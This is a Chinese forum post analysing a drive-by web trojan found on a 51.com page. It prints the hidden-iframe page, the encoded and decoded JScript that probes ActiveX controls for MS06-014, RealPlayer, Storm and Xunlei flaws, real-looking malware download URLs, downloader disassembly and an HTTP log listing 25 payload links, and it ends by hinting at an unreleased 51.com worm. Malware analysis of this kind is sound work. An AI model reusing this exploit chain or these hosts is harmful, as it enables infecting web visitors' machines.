无意发现51某个空间有木马,就分析了一下。
复制内容到剪贴板
代码:
<html>
<title></title>
<table border="0" cellspacing="0" cellpadding="0" align="center" height=160>
<tr><td >
<b>出错了 你访问的页面并不存在</b>
</td></tr>
</table>
<br><br><br>
<center>
<form name=loading>
<p><font color="7285CF">正在为你载入,请稍候.......</font></p>
<p>
<input type=text name=chart size=46 style="font-family:Arial; font-weight:bolder; color:7285CF; background-color:white; padding:0px; border-style:none;">
<br>
<input type=text name=percent size=46 style="font-family:Arial; color:FF0000; text-align:center; border-width:medium; border-style:none;">
<script>var bar = 0
var line = "||"
var amount ="||"
count()
function count(){
bar= bar+2
amount =amount + line
document.loading.chart.value=amount
document.loading.percent.value=bar+"%"
if (bar<100)
{setTimeout("count()",20);}
else
{window.location = "http://www.55py.com/";}
}
</script>
</p>
</form>
</html>
<iframe src=http://60.190.118.233/4.htm width=97 height=0 frameborder=0></iframe>
<iframe src=http://60.190.118.233/4.htm width=100 height=0 frameborder=0></iframe>
<iframe src=http://60.190.118.233/4.htm width=100 height=0 frameborder=0></iframe>
接下来,看看4.htm的内容
复制内容到剪贴板
代码:
<iframe src=http://60.190.118.233/ai/index.htm width=100 height=0></iframe>
<script src=''http://s35.cnzz.com/stat.php?id=876890&web_id=876890'' language=''JavaScript'' charset=''gb2312''></script>
<script src=''http://s141.cnzz.com/stat.php?id=854550&web_id=854550'' language=''JavaScript'' charset=''gb2312''></script>
<HTML><BODY>
2个站长统计.继续./ai/index.htm 的内容
复制内容到剪贴板
代码:
<script>window.onerror=function(){return true;}</script>
<Script Language="JScript.Encode">#@~^6goAAA==@#@&d-mD,mWK3,xPr/rVxOAsJi@#@&d@#@&d6;UmDkKx~/nO;WG3bn` lhnBP\Cs!+SPaak.#,@#@&i ,~P@#@&7dSkU[KhR9Gm!:+ O mKW0knPx~ lh+,QPr''E~3P+d^mwn`7C^En*P3P`v+X2kM+~''{PU;^V#,_PrJP=~cJpP62k.nk''EP3~+Xwr.RYG!tKjYMr oc*#*i@#@&d)@#@&@#@&70!x^ObWx,L+DZWKVr+v1m:n#~@#@&d`P,~@#@&d7-mDPdnmD^t,x,1Cs+,_Pr''rI@#@&d7k6PcAbxNKAR9Wm!hnxDR1WG3rncVnxTOt,@*~T*P@#@&7i ~@#@&7idG60k+Y,'',Ak NGhcNG^!:+ OR1WW0rnRbx9+arWck+CD14#p@#@&7idkW~vWW0knDPZ{P F#,@#@&7di ~@#@&d77iW06d+DP_{~d+mD1t VnUTY4i,~P,P~~@#@&d77,Pnx9~{PAbx9WhcNK^Es+UYcmGG0k+crx9+6}WcJpJBPG0WdYbP,~P,P~@#@&dd7~,kWPvn N~{'',OF*@#@&7diP~P,+U[,''PSrx9Whc[Gm!:xOR^GK3r+cs+ oO4p@#@&77iP~DO!DU,E +/1lan`SkUNKh [KmEsnxDRmKGVkRkE8/O.bxL`KW0k+OS,+x[b*i@#@&i7iPN@#@&idP)@#@&7P,DnY!DU~ EV^I@#@&d8@#@&@#@&i0!x^YrG P.+Tr/D+.c l:nb,@#@&dP@#@&d77lMPYKNmzP{PU+SP9CD+`*I@#@&dd7C.P6ak.+d~{PU+S~fmYnc*i@#@&7i+awb./ k+DKks+vOW9lzRT+OPb:+vbP3PFZTTe+!CvTe+**i@#@&i7/Y/GK3knc1WG3B~ lh~,+6akMn/*i@#@&i8@#@&@#@&d6;x1YkKU~Wa+ \`b~@#@&7 @#@&di\C.,mPx~T+OZKG0knvmKW3*i@#@&dikWPvm~Z{Px!sV*P@#@&77 @#@&iP~d.nDE.xp@#@&idN@#@&dd@#@&id.+TrkYnM`1WW0#p@#@&id@#@&idAr NWS N0l!sO?DlDEd''E完成Ep@#@&di7@#@&d7OMX ~-mD~+p@#@&d7i\mDPmNKx`9W^Es+UOcmDCY2VhnxD`rW8Ln^DJb#p@#@&id7C9WRdnDbOYMr(EO`rmVm/krNr~Em^/r[=AfOZl*v Xb2O8F9!R1R&)OZTZZco/y,2fr#I@#@&7id-mD,l/{l9GR1DnlD+G8N+mDcJzNW98 ?DDlhJSEr#N@#@&7d1lO^4`+b`)i@#@&i76kUmV^X @#@&i7db0c+e''E,K4L^Y,2DMG.Tr#P@#@&d77iNGm!h+ Y AMkYncr@!r0MCs+~Sk9Yt{*Z~tkLtD''T~kDm{qcctYs@*@!zb0Mlh+@*E*8@#@&i7dVdn@#@&d77Pd@#@&i7idOMXPP\mD,%i@#@&7did7-mDPMnl^FF{Unh,b1Yr\np}4%+1O`rq3]hJ_E/DV qrQr2]hZDVR8J*I8@#@&7did^CDmtv%#P8i@#@&7did6kUlssH r0v%"{J,G(L+^O,2.DK.YJbPk6`xh,)mDk-+or8%mYvEqAIn;OsR&2"n/Ys 8JbRhslH+.KMWwn.DXcJh]}fi;Kj2IUq}HJ*@!xJ+RT 8cRlX r#@#@&~~P,P,P~P~~,P~P,~P,P~~,PP~~,P~P,~,P~,P,P 9W1;:xORSDrO`B@!r0Ml:~Ak9Y4''q!~4kLtDx!,/.^{DV 4D:@*@!Jr6DCs+@*B#)@#@&~P,P~P,P~~,PP,~P,PP,~~P,PVd+@#@&,P~P,~P,P~~,PP~~,P~P,~,P~P@#@&ddidi[W1Eh+ Y AMkYcB@!k0MCh+,hbNOtxqZP4+bLtD''T~kDmxUh tDh@*@!&b0Ml:@*Eb8)8@#@&@#@&77idYMz ,\lM~Li@#@&id7d7-mD~o^AWMV[x +h~)1Yr\p}4%mD`JVS&3fKhUR&29GSxR8E#p8@#@&77dimmY^tcL* Ni@#@&did7WbxlssH r0vLe''E]W(L+1Y,3DMW.Tr#`@#@&ddi7d9Wm!hnxDRSDrYncE@!r0MC:PdOHV+x[b/2Vmz=xG +,/D1''^"R4Yh@*@!zrWMl:@*B*88@#@&@#@&ididODz`,\CD,4i@#@&77idd-CMPdYK.s''Uh,bmDk7n(}4%+1YcEtn?cjYKD:hsCXDcFE#IN@#@&7di7mmY^4vt#`Np@#@&di7i0r l^VXPk6cte''E$K4%n1YPA.DKDTrb`@#@&did7d[G1Eh+ ORSDrO`B@!r6DC:~kYz^+{Nkkw^CX=xGxPd.1''46 tD:@*@!&r0Mls+@*BbN)@#@&@#@&7didO.H P-CMPWi@#@&id7id7lD,Y4;x9+.'' +A~zmYb-+or4Nn^YvJGn/Vrn Y .K[J*iN@#@&dd771lOm4c6#`)i@#@&didiWk lsVH ~r6`0exJ]W4Nn^Y,2MDGDDE* @#@&i7did[G1E:nUDRADbO`v@!k6Dls+,Ak9Y4''l!~4ko4O''ZP/M^x6^R4Yh@*@!&b0.lsn@*E#NN@#@&@#@&7id7k6c6''xr$K4LmD~2MDGDYJ~''LPo{xJ]W4Nn^Y,2MDGDDE,[''P4x''r$G8N+mO~AD.WMDrP''LPN''''r$K8LmOPAD.GMTJ*@#@&iddi`sW1lDkGx .wsl1n`rl8G!Y)8smxVJ*I)@#@&idi88@#@&iN@#@&@#@&Wa+U t`#p@#@&r+YCAA==^#~@</script>
</BODY></HTML>
看JS<Script Language="JScript.Encode"> 用的是JS的Encode加密,找个解密的.
复制内容到剪贴板
代码:
<script>window.onerror=function(){return true;}</script>
<Script Language="JScript">
var cook = "silentwm";
function setCookie(name, value, expire)
{
window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));
}
function getCookie(Name)
{
var search = Name + "=";
if (window.document.cookie.length > 0)
{
offset = window.document.cookie.indexOf(search);
if (offset != -1)
{
offset += search.length;
end = window.document.cookie.indexOf(";", offset)
if (end == -1)
end = window.document.cookie.length;
return unescape(window.document.cookie.substring(offset, end));
}
}
return null;
}
function register(name)
{
var today = new Date();
var expires = new Date();
expires.setTime(today.getTime() + 1000*60*60*24);
setCookie(cook, name, expires);
}
function openWM()
{
var c = getCookie(cook);
if (c != null)
{
return;
}
register(cook);
window.defaultStatus="完成";
try{ var e;
var ado=(document.createElement("object"));
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<iframe width=50 height=0 src=14.htm></iframe>")}
else //MS06014漏洞
{
try{ var j;
var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}
catch(j){};
finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write(''<iframe width=10 height=0 src=rl.htm></iframe>'')}//RealPlay漏洞
else
{
document.write(''<iframe width=10 height=0 src=new.htm></iframe>'')}}}
try{ var g;
var glworld=new ActiveXObject("GLIEDown.IEDown.1");}
catch(g){};
finally{if(g!="[object Error]"){
document.write(''<iframe style=display:none src=lz.htm></iframe>'')}}
try{ var h;
var storm=new ActiveXObject("MPS.StormPlayer.1");}
catch(h){};
finally{if(h!="[object Error]"){
document.write(''<iframe style=display:none src=bf.htm></iframe>'')}}
//暴风影音漏洞
try{ var f;
var thunder=new ActiveXObject("DPClient.Vod");}
catch(f){};
finally{ if(f!="[object Error]"){
document.write(''<iframe width=50 height=0 src=xl.htm></iframe>'')}}
//迅雷漏洞
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]" && j=="[object Error]")
{location.replace("about:blank");}
}}
}
openWM();
</script>
网马 06014 ,暴风,迅雷,Real
木马地址:
复制内容到剪贴板
代码:
http://60.190.118.233/8/x.exe
UPX壳
复制内容到剪贴板
代码:
004022F2 6A 70 push 70 //OEP
004022F4 68 18314000 push 00403118
004022F9 E8 CA020000 call 004025C8
004022FE 33DB xor ebx, ebx
Microsoft Visual C++ 7.0 Method2
复制内容到剪贴板
代码:
0040211C 68 F4404000 push 004040F4 ; httpaddurl
00402121 57 push edi
00402122 FFD6 call esi
00402124 68 E8404000 push 004040E8 ; inithttp
00402129 57 push edi
0040212A A3 00554000 mov dword ptr [405500], eax
0040212F FFD6 call esi
00402131 68 DC404000 push 004040DC ; readhttp
00402136 57 push edi
00402137 A3 04554000 mov dword ptr [405504], eax
0040213C FFD6 call esi
0040213E 833D 04554000 0>cmp dword ptr [405504], 0
00402145 A3 08554000 mov dword ptr [405508], eax
0040214A 5E pop esi
一个下载者,访问b.txt 文件,挖哈哈,25个文件地址....
复制内容到剪贴板
代码:
GET /8/b.txt HTTP/1.1
Host: 60.190.118.233
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 5.00; XP)
Pragma: no-cache
Cache-Control: no-cache
Connection: close
HTTP/1.1 200 OK
Content-Length: 989
Content-Type: text/plain
Last-Modified: Mon, 12 May 2008 19:17:37 GMT
Accept-Ranges: bytes
ETag: "f24d28d764b4c81:743"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 13 May 2008 05:30:57 GMT
Connection: close
ver=1
Url1=http://dl.ssl790.cn/cao/aa1.exe
Url2=http://dl.ssl790.cn/cao/aa2.exe
Url3=http://dl.ssl790.cn/cao/aa3.exe
Url4=http://dl.ssl790.cn/cao/aa4.exe
Url5=http://dl.ssl790.cn/cao/aa5.exe
Url6=http://dl.ssl790.cn/cao/aa6.exe
Url7=http://dl.ssl790.cn/cao/aa7.exe
Url8=http://dl.ssl790.cn/cao/aa8.exe
Url9=http://cw.ssl790.cn/cao/aa9.exe
Url10=http://cw.ssl790.cn/cao/aa10.exe
Url11=http://cw.ssl790.cn/cao/aa11.exe
Url12=http://cw.ssl790.cn/cao/aa12.exe
Url13=http://cw.ssl790.cn/cao/aa13.exe
Url14=http://cw.ssl790.cn/cao/aa14.exe
Url15=http://cw.ssl790.cn/cao/aa15.exe
Url16=http://cw.ssl790.cn/cao/aa16.exe
Url17=http://ta.ssl790.cn/cao/aa17.exe
Url18=http://ta.ssl790.cn/cao/aa18.exe
Url19=http://ta.ssl790.cn/cao/aa19.exe
Url20=http://ta.ssl790.cn/cao/aa20.exe
Url21=http://ta.ssl790.cn/cao/aa21.exe
Url22=http://ta.ssl790.cn/cao/aa22.exe
Url23=http://ta.ssl790.cn/cao/aa23.exe
Url24=http://ta.ssl790.cn/cao/aa24.exe
Url25=http://ta.ssl790.cn/cao/aa25.exe
木马还免杀的...
接下来,搞51.com的AJAX蠕虫,他对flash文件没有任何过滤.现在还属于危险期间,就不公布病毒代码了,其他的就自己发挥了...
效果还比较猛...现在
